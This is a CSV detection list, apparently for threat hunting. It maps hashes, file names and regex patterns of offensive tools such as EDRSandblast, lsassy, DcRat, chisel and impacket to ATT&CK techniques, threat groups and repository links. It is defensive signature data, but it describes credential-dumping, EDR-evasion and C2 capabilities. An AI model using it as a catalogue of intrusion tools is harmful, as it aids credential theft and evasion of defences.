"*EDE1D800842E11B147A6E039507EA5DCD7F825BF9AF3195F8B1FAF10080CDE77*",".{0,1000}EDE1D800842E11B147A6E039507EA5DCD7F825BF9AF3195F8B1FAF10080CDE77.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","42810"
"*edea603b85c0e9a13eeaa8562930bd94fc5929e8300b070e89e5342ca16eca29*",".{0,1000}edea603b85c0e9a13eeaa8562930bd94fc5929e8300b070e89e5342ca16eca29.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","42812"
"*edf46019fc966e2dfebe6209744075f41b8e58dcfe1d8247284e88b240149e35*",".{0,1000}edf46019fc966e2dfebe6209744075f41b8e58dcfe1d8247284e88b240149e35.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42813"
"*edf490ea415dd61542383334e235a53861419d05fcb719080ca5b31550bba737*",".{0,1000}edf490ea415dd61542383334e235a53861419d05fcb719080ca5b31550bba737.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","42814"
"*edf8c7fe2bd7241aafa9109be239698bc7e840097ffaec13a6a593876bdb6e97*",".{0,1000}edf8c7fe2bd7241aafa9109be239698bc7e840097ffaec13a6a593876bdb6e97.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","42815"
"*edf9405f4286e33ff63ec5b16f35981f52ecc1404227b043e8022cadbc01b925*",".{0,1000}edf9405f4286e33ff63ec5b16f35981f52ecc1404227b043e8022cadbc01b925.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42816"
"*edfc7e6329aeeb8cb0df8734ad9083840020e9d2d81d4ae71609dc7339552a0a*",".{0,1000}edfc7e6329aeeb8cb0df8734ad9083840020e9d2d81d4ae71609dc7339552a0a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42817"
"*edge_wscript_wsh_injection*",".{0,1000}edge_wscript_wsh_injection.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","42818"
"*edge1.parrot.run*",".{0,1000}edge1\.parrot\.run.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","42819"
"*EditC2Dialog.*",".{0,1000}EditC2Dialog\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","42820"
"*Edit-FileWMI*",".{0,1000}Edit\-FileWMI.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","42821"
"*EDR Detector by trickster0*",".{0,1000}EDR\sDetector\sby\strickster0.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","0","N/A","N/A","7","1","93","14","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z","42823"
"*EDR_Detection.exe*",".{0,1000}EDR_Detection\.exe.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","N/A","7","1","93","14","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z","42824"
"*EDR_Detector.7z*",".{0,1000}EDR_Detector\.7z.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","N/A","7","1","93","14","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z","42825"
"*EDR_Detector-master*",".{0,1000}EDR_Detector\-master.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","N/A","7","1","93","14","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z","42826"
"*edraser.py -*",".{0,1000}edraser\.py\s\-.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","42827"
"*EDRaser-main*",".{0,1000}EDRaser\-main.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","42828"
"*EDRSandblast.c*",".{0,1000}EDRSandblast\.c.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","42829"
"*EDRSandblast.exe*",".{0,1000}EDRSandblast\.exe.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","42830"
"*EDRSandblast.exe*",".{0,1000}EDRSandblast\.exe.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42831"
"*EDRSandBlast.h*",".{0,1000}EDRSandBlast\.h.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42832"
"*edrsandblast.py*",".{0,1000}edrsandblast\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","42833"
"*EDRSandblast.sln*",".{0,1000}EDRSandblast\.sln.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","42834"
"*EDRSandblast.sln*",".{0,1000}EDRSandblast\.sln.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42835"
"*EDRSandblast.vcxproj*",".{0,1000}EDRSandblast\.vcxproj.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42836"
"*EDRSandblast_API.c*",".{0,1000}EDRSandblast_API\.c.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42837"
"*EDRSandblast_API.exe*",".{0,1000}EDRSandblast_API\.exe.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42838"
"*EDRSandblast_API.h*",".{0,1000}EDRSandblast_API\.h.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42839"
"*EDRSandblast_CLI*",".{0,1000}EDRSandblast_CLI.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","42840"
"*EDRSandblast_LsassDump*",".{0,1000}EDRSandblast_LsassDump.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","42841"
"*EDRSandblast_LsassDump.c*",".{0,1000}EDRSandblast_LsassDump\.c.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42842"
"*EDRSandblast_LsassDump.exe*",".{0,1000}EDRSandblast_LsassDump\.exe.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42843"
"*EDRSandblast_StaticLibrary*",".{0,1000}EDRSandblast_StaticLibrary.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","42844"
"*EDRSandblast-GodFault*",".{0,1000}EDRSandblast\-GodFault.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42845"
"*EDRSandblast-master*",".{0,1000}EDRSandblast\-master.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","42846"
"*EDRSilencer.exe*",".{0,1000}EDRSilencer\.exe.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","1","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","42847"
"*eDY0L21pbWlrYXR6LmV4ZQ==*",".{0,1000}eDY0L21pbWlrYXR6LmV4ZQ\=\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","42848"
"*eDY0L21pbWlrYXR6LmV4ZQ==*",".{0,1000}eDY0L21pbWlrYXR6LmV4ZQ\=\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","42849"
"*ee0349d1878fb3eac38c76f8d1b2fadc5c20cf08b7d0ab5a528e8a30e9a3a8e9*",".{0,1000}ee0349d1878fb3eac38c76f8d1b2fadc5c20cf08b7d0ab5a528e8a30e9a3a8e9.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42850"
"*EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3*",".{0,1000}EE03FAA9\-C9E8\-4766\-BD4E\-5CD54C7F13D3.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","42851"
"*ee0833e987b03dea01e4261379eab657b48ee2d91e904e079497e263da68a1e1*",".{0,1000}ee0833e987b03dea01e4261379eab657b48ee2d91e904e079497e263da68a1e1.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","42853"
"*ee09435faed339e34600ff9b157cbcedec2fdedcf6e20b058acd162eb720da1d*",".{0,1000}ee09435faed339e34600ff9b157cbcedec2fdedcf6e20b058acd162eb720da1d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42855"
"*ee09b69221509034225e37497bc6bc00498fa914adb00b0fad89b39443a70db6*",".{0,1000}ee09b69221509034225e37497bc6bc00498fa914adb00b0fad89b39443a70db6.{0,1000}","offensive_tool_keyword","PrivFu","inspect token information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","42856"
"*ee0ef3b713324cc7b0d6406c194c4e563fdcbcdea330300844e30603969cbde3*",".{0,1000}ee0ef3b713324cc7b0d6406c194c4e563fdcbcdea330300844e30603969cbde3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42857"
"*ee18de5f0cb000c4b6aaedcfc8fb2f402d45d4f70d5cb87db2d7232b3cd3c204*",".{0,1000}ee18de5f0cb000c4b6aaedcfc8fb2f402d45d4f70d5cb87db2d7232b3cd3c204.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42858"
"*ee21ea772594f2e49cabc02176dd935af45c0573a90ff3b10957a4f98c804e37*",".{0,1000}ee21ea772594f2e49cabc02176dd935af45c0573a90ff3b10957a4f98c804e37.{0,1000}","offensive_tool_keyword","PrivFu","inspect token information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","42859"
"*ee229f4fa581d63bf7bdf8688a0b6386e3b01bb107165fd30df7c573897a094e*",".{0,1000}ee229f4fa581d63bf7bdf8688a0b6386e3b01bb107165fd30df7c573897a094e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42860"
"*ee27cb1d6e87e293f1fa91adb5870328890990e941d1fabe5cb4565fb4795a21*",".{0,1000}ee27cb1d6e87e293f1fa91adb5870328890990e941d1fabe5cb4565fb4795a21.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","42861"
"*ee29b50f82ac78854af1e014fe9986a9699f98683ca798092f6b51282c08d640*",".{0,1000}ee29b50f82ac78854af1e014fe9986a9699f98683ca798092f6b51282c08d640.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","42862"
"*ee29e80a2e8c469655fe215eac14c2fbb201116e40fd056dcd1f602e1959263b*",".{0,1000}ee29e80a2e8c469655fe215eac14c2fbb201116e40fd056dcd1f602e1959263b.{0,1000}","offensive_tool_keyword","PwDump7","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.openwall.com/passwords/windows-pwdump","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","42863"
"*ee2b096fee2d9337ce5b2e1506ffdae090833eefc634b73f22046679de392f05*",".{0,1000}ee2b096fee2d9337ce5b2e1506ffdae090833eefc634b73f22046679de392f05.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","42864"
"*ee2f6d712d46999e0a71694fbb8eb206c4d6555e187ab4f70257c83446091355*",".{0,1000}ee2f6d712d46999e0a71694fbb8eb206c4d6555e187ab4f70257c83446091355.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42866"
"*ee30d8fb660ce3a25a8664c6214f2766a7099bdd78392009d961d22b7fd3ded2*",".{0,1000}ee30d8fb660ce3a25a8664c6214f2766a7099bdd78392009d961d22b7fd3ded2.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#filehash","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","42867"
"*ee4039b4d2aede8f5f64478bc59faac86036796be24dea8dc18f009fb0905e4a*",".{0,1000}ee4039b4d2aede8f5f64478bc59faac86036796be24dea8dc18f009fb0905e4a.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","42873"
"*ee58b36f91a49518422e7eab0fd0c82c9a154f95ae9dde863a02bc4da7ff398c*",".{0,1000}ee58b36f91a49518422e7eab0fd0c82c9a154f95ae9dde863a02bc4da7ff398c.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - 